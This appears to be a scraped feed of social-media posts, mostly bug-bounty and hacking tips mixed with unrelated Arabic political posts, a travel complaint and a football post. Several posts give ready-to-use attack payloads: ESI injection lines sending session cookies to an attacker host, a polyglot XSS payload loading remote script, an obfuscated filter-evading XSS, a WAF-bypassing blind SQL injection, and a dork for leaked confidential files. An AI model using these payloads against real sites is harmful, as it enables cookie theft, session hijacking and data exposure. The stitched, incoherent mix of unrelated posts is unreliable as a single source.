Daily Notes : Day 83 ESI Injcetion - Exploitation XSS - <esi:include src=http://<domain>.com/xss.html> COOKIE STEALING - <esi:include src=http://<attacker>.com/$(HTTP_COOKIE)> <esi:include src="http://<attacker>.com/?cookie=$(HTTP_COOKIE{'JSESSIONID'})" /> AKAMAI DEBUG

Thought I'd share this remote code execution on one of the main sites for a large H1 target from a year ago. I found this one by being persistent and using Param Miner by James Kettle . After Param Miner discovered the header it was all manual testing to detect the template engine

حكامنا أنتم مصيبتنا وأساس بلائنا صدقت ي شيخ👌

🚨 #XSS Payload to Use EVERYWHERE! 🚨 JavaScript://%250A/*?'/*\'/*"/*\"/*`/*\`/*%26apos;)/* <!--</Title/</Style/</Script/</textArea/</iFrame> \74k<K/contentEditable/autoFocus/OnFocus= /*${/*/;{/**/(import(/https:\\X55.is/.source))}//\76--> Pops in +20 scenarios ✨

A fast tool to scan prototype pollution vulnerability written in Rust. 🦀 - github.com/dwisiswant0/pp… #infosec #cybersec #bugbountytips

إسمعوا كلام، د/ حازم صلاح ابو إسماعيل كلام الراجل ده بالحرف بيحصل حاليًا بداية من تهجير سكان رفح المصريه، هي حدودنا ليه فاضيه فعلاً ومفيهاش سكان ؟ 😅

aUtHenTiCaTed RCE Citrix?

Just got a reward for a critical vulnerability submitted on YesWeHack ⠵ -- Improper Access Control - Generic (CWE-284). #YesWeRHackers

Microsoft 2024 Leaderboard فين بقيه عده الصياده Microsoft Security

رئيس غويانا المسلم الذي اكتشفت دولته النفط يلجم مذيع BBC حول تغيير المناخ ⚠️

The worst trip ever. Bus N1193 from Paris to Lisbon — 22.5 hours stuck in the same position, and they inform us just 30 mins before departure that there’s no WiFi. And all that for €72. Absolute joke. #TravelFail #ParisToLisbon Flix

I just published a Repeater feature to make it easier to explore request smuggling. It repeats your request until the status code changes. It's called "Retry until success" and you can install it via the Extensibility helper bapp.

Cloudflare 403 bypass to time-based blind SQLi: PL: (select(0)from(select(sleep(10)))v) → 403 but PL: (select(0)from(select(sleep(6)))v)/*'%2B(select(0)from(select(sleep(6)))v)%2B'%5C"%2B(select(0)from(select(sleep(6)))v) → Time-based Blind SQLi #BugBounty #SQLi

Testing for file upload vulnerabilities? 🧐 Check out Malicious PDF Generator, an open-source toolkit to help you generate tens of malicious PDF files designed to exploit various vulnerabilities and insecure features found in PDF readers! 🤠 🔗 github.com/jonaslejon/mal…

Sensitive info leak via google dork site:.target.com ( "date of birth" OR confidential OR "internal use only" OR "balance sheet" OR "profit and loss" OR "banking details" OR "source code" OR "national id" OR "top secret" ) (ext:pdf OR ext:doc OR ext:ppt OR ext:txt OR ext:csv)

A nice one by VIEH Group to evade Cloudflare & Akamai <address onscrollsnapchange=window['ev'+'a'+(['l','b','c'][0])](window['a'+'to'+['b','c','d'][0]]('YWxlcnQob3JpZ2luKQ==')); style=overflow-y:hidden;scroll-snap-type:x><div style=scroll-snap-align:center>1337</div></address>

Cool list of Nuclei AI prompts by DIMOOON 🇺🇦! - Recon - SQL Injection - XSS - SSRF  - RCE - XXE And much more! Check it out! 👇 github.com/reewardius/Nuc…

دخل الأسطول الشوط الأخير من الرحلة؛ دعاؤكم 🍃

Install ASNmap now: github.com/projectdiscove…

World Champions! 🏆🇲🇦 #U20WC